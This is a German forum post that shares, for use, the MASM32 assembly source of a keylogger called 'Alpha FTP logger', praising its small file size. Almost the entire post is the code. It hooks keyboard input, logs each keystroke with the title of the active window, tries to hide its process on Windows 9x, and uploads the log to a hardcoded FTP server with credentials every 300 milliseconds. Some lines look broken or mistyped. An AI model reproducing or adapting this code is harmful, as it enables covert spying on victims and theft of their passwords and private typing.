Hier ein Simpler Keylogger mit FTP Upload von DaRkReD aus OpenSc.ws, sehr kleine Filesize.
[php]
;Alpha FTP logger
;By DaRkReD
;Released on 3/31/2011
.486
.model flat, stdcall
option casemap :none
include C:\masm32\include\windows.inc
include C:\masm32\include\kernel32.inc
include C:\masm32\include\user32.inc
include C:\masm32\include\wininet.inc
includelib C:\masm32\lib\kernel32.lib
includelib C:\masm32\lib\user32.lib
includelib C:\masm32\lib\wininet.lib
JournalLogHook PROTO :DWORD, :DWORD, :DWORD
NAME_BUFF_SIZE = MAX_COMPUTERNAME_LENGTH + 1
.data
appName DB ‚Caller‘, 0
FTPAddress DB ‚192.168.1.66‘, 0
Username DB ’nobody‘, 0
Password DB,’redacted‘ 0
localFile DB ‚key.txt‘, 0
remoteFile DB ‚test3.txt‘, 0
hInternet HANDLE ?
hConnect HANDLE ?
bracket1 db "<"
bracket2 db ">"
linefeed db 13,10,13,10,"[> %s <]",13,10,0;
isLogging dd 1
vKey dd 0
nScan dd 0
dwCount dd 0
schar db 2 dup (0)
kernel_name db "kernel32.dll", 0
kernel_function db "RegisterServiceProcess", 0
nSize dd NAME_BUFF_SIZE
keyvalz db "Key.txt"
logfilecon db 14 dup(?)
logfileN db "Keyz.txt", 16 dup(0)
zlogfilecon db 14 dup(?)
alogfilecon db 255 dup(?)
drive db "C:\",0
random_seed dd ?
res dd 0
sFmt db ‚C:\%u‘,0
sBuf db 10 dup(0)
.data?
ThreadID DWORD ?
logfile db 261 dup (?)
hinstance HINSTANCE ?
aMsg MSG <?>
LogHook dd ?
svBuffer dword ?
WinDir db 35 dup(?)
MyPath db 256 dup(?)
kBuffer db 256 dup (?)
kFwin db 256 dup (?)
kGkl db 256 dup (?)
wBuffer db 512 dup (?)
chcount dd ?
dwBytes dd ?
aFocus dd ?
lFocus dd ?
lastvKey dd ?
NameBuffer db NAME_BUFF_SIZE dup(?)
.code
ThreadProc proc
;—-FTP UPLOAD—-
FTP:
Invoke InternetOpen, Addr appName, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0
Mov hInternet, Eax
Invoke InternetConnect, hInternet, Addr FTPAddress, INTERNET_DEFAULT_FTP_PORT, Addr Username, Addr Password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0
Mov hConnect, Eax
Invoke FtpPutFile, hConnect, Addr localFile, Addr remoteFile, FTP_TRANSFER_TYPE_BINARY, 0
Invoke InternetCloseHandle, hConnect
Invoke InternetCloseHandle, hInternet
Invoke Sleep,300
jmp FTP
ThreadProc endp
JournalLogHook proc uses edi code:DWORD, wParam:WPARAM, lParam:LPARAM
LOCAL filehandle:dword
.if code < 0
invoke CallNextHookEx, LogHook, code, wParam, lParam
ret
.endif
.if code == HC_ACTION
mov edi, lParam
assume edi:ptr EVENTMSG
.if [edi].message == WM_KEYDOWN
mov eax, [edi].paramL
mov ah, 0
mov vKey, eax
mov eax, [edi].paramL
mov al, 0
shl eax, 8
mov nScan, eax
invoke CreateFile, addr alogfilecon,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov filehandle, eax
invoke SetFilePointer, filehandle,NULL, NULL, FILE_END
invoke GetKeyNameText, nScan,addr svBuffer, 256
mov dwCount, eax
invoke GetActiveWindow
mov aFocus, eax
.if eax != lFocus
mov lFocus, eax
invoke GetWindowText, aFocus, addr kBuffer, 256
mov chcount, eax
.if chcount > 0
invoke wsprintf, addr wBuffer, addr linefeed, addr kBuffer
invoke lstrlen, addr wBuffer
mov chcount, eax
invoke WriteFile, filehandle, addr wBuffer, chcount, addr dwBytes, NULL
.endif
.endif
.if dwCount > 0
.if vKey == VK_SPACE
mov svBuffer, 32
mov svBuffer + 1, 0
mov dwCount, 1
.endif
.if vKey == VK_CAPITAL
mov svBuffer,0
mov dwCount,1
.endif
.if vKey == VK_SHIFT
mov svBuffer,0
mov dwCount,1
.endif
.if dwCount == 1
.if lastvKey != 186
invoke GetKeyboardState, addr kBuffer
invoke GetForegroundWindow
invoke GetWindowThreadProcessId,eax,0
invoke GetKeyboardLayout ,eax;
invoke ToAsciiEx, vKey, nScan, addr kBuffer, addr schar, 0 ,eax
mov chcount, eax
.else
mov chcount, 1
mov eax, vKey
mov schar, al
.endif
.if chcount > 0
invoke WriteFile, filehandle, addr schar, chcount, addr dwBytes, NULL
.endif
.else
invoke WriteFile, filehandle, addr bracket1, 1, addr dwBytes, NULL
invoke WriteFile, filehandle, addr svBuffer, dwCount, addr dwBytes, NULL
invoke WriteFile, filehandle, addr bracket2, 1, addr dwBytes, NULL
.if vKey == VK_RETURN
invoke WriteFile, filehandle, addr linefeed, 2, addr dwBytes, NULL
.endif
.endif
mov eax, vKey
mov lastvKey, eax
.endif
invoke CloseHandle, filehandle
.endif
.endif
invoke CallNextHookEx, LogHook, code, wParam, lParam
ret
JournalLogHook endp
str_cat proc strBase:DWORD, strAdd:DWORD
mov edi, strBase
mov al, 0
repne scasb
dec edi
mov esi, strAdd
@@:
mov al, [esi]
mov [edi], al
inc esi
inc edi
test al, al
jnz @B
ret
str_cat endp
Random proc dwBase:dword
push ebx
mov eax,dwBase
xor ebx,ebx
imul edx,random_seed,08088405h
inc edx
mov random_seed,edx
mul edx
mov eax,edx
pop ebx
ret
Random endp
Randomize proc
invoke GetTickCount
mov random_seed,eax
ret
Randomize endp
start:
invoke Randomize
invoke Random,9000
mov res,EAX
invoke wsprintf,ADDR sBuf,ADDR sFmt,res
invoke lstrcpy,ADDR zlogfilecon,ADDR sBuf
invoke str_cat,ADDR zlogfilecon,ADDR keyvalz
invoke lstrcpy,ADDR alogfilecon,ADDR drive
invoke lstrcat,ADDR alogfilecon,ADDR zlogfilecon
;try to hide only 9x
invoke GetModuleHandle, ADDR kernel_name
invoke GetProcAddress, eax, ADDR kernel_function
.if eax != NULL
push 1
push 0
call eax
.endif
invoke GetModuleHandle, NULL
;–
mov hinstance, eax
invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
mov LogHook, eax
mov eax,OFFSET ThreadProc
invoke CreateThread,NULL,NULL,eax,NULL,0,ADDR ThreadID
.while isLogging == 1
invoke WaitMessage
invoke GetMessage, addr aMsg, NULL, 0, 0
invoke SetKeyboardState, addr kBuffe
invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL
mov LogHook, eax
.endw
invoke UnhookWindowsHookEx,addr LogHook
invoke ExitProcess, 0
end start
[/php]